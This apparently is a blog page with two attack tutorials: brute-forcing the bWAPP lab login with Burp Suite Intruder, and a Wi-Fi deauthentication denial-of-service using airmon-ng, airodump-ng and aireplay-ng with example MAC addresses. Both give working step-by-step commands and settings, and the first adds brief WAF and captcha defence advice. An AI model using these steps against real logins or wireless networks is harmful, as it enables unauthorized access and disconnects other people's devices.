Brute Force Attack

 Brute Force Attack is a popular cracking method with tapping Users & Password one by one in a short time using Machine or Tool, for now I going to show you how to hack website using Brute Force to Knowing What Users and Password which is suitable in Database that webapp using Machine or Tool BurpSuite

Step 1. Access website Bwapp which has been installed in your Lab, and now we try to input wrong user and password, to know what response provided by web, and now we already know the keyword response is Invalid 

Step 2. Now input again user and password with intercept is on in burpsuite, after the traffic already intercept right click and select Send to Intruder 

Step 3. The default will showing like this

Step 4. Now we change like the picture below
Attack Type    : Cluster Bomb
Login              : $admin$
Password        : $admin$

Step 5. Click tab payloads this is for users
Payload set        : 1 
Payload type      : Simple List 
Payload Options: (add all user or if you have wordlist upload to burpsuite) 

Step 6. Keep in the tab payload but this is for passwords

Payload set     : 2 

Payload Type     : Simple List 

Payload Options : (add all password or if you have wordlist upload to burpsuite) 

Step 8. Click tab Options, and look at Grep Match, add the response of the webapp, and then click Start Attack Example : Invalid

Step 9. The burpsuite will check one by one users and passwords, if ther is user and password match look at Invalid will showing uncheck, the webapp no response keyword invalid 

Step 10. Now we try to login to the webapp, and the result we can login using user : bee and password : bug

If you have Website and you want prevent from this attack you can using WAF or you can using Captcha, so if there are Traffic attack to your website using Brute Force, WAF or Captcha can identify that traffic is BruteForce in a way if there are User try to login 5 wrong times in a row within 1 minutes WAF and Captcha can identify and will block or appears the Captcha Authentication 

Thank You

Read More

How to DOS Attack Wifi

So in this section i want to share you how to DOS Attack on Wifi using Kali Linux, this article purpose only to learning and knowledge, or if we want to kick users of the your Wifi network. For the first time we need installed Kali Linux on Raspberry or Vm, if using Vm we need adaptor Wifi External, if Kali linux already installed for now we are access Kali Linux and login

Step 1. Open up terminal and type #iwconfig this command to check your interface Wifi

Step 2. Type #airmon-ng start wlan0 to change mode to be Monitor

Step 3. in this step we lock your wireless specific ssid we want to attack with type #airodump-ng (name of your wireless interface) for example #airodump-ng wlan0mon

Step 4. still continue step 3 with type #airodump-ng --channel (Channel of Access Point under CH) --bssid (BSSID Mac Address from Access Point) (name of your interface) for example #airodump-ng --channel 6 --bssid E4:47:B3:94:F6:8E wlan0mon , and we can see clients connected to the Wifi BaCan under Station tab

Step 5. for the last step we start to DOS Attack to Wifi which we have chosen, there are 2 ways we can attack all clients or specific client to kick on the Wifi Network, if we want to all clients kick on the Wifi network with type #airplay-ng -0 0 -a (Mac Address of Access Point) (Name of your interface) example #aireplay-ng -0 0 -a E4:47:B3:94:F6:8E wlan0mon

If we want to specific client we need type #aireplay-ng --deauth 2000 -a (Mac Address of Access Point) -c (Mac Address of Client) (Name of your interface)

example #aireplay-ng --deauth 2000 -a E4:47:B3:94:F6:8E -c 18:26:77:00:B8:71 wlan0mon after run that command we see the client that is connected to wifi is it still connected or has been disconnected, if you want to check on Kali linux you just type the command 

#airodump-ng --channel 6 --bssid E4:47:B3:94:F6:8E wlan0mon

THANK YOU

Read More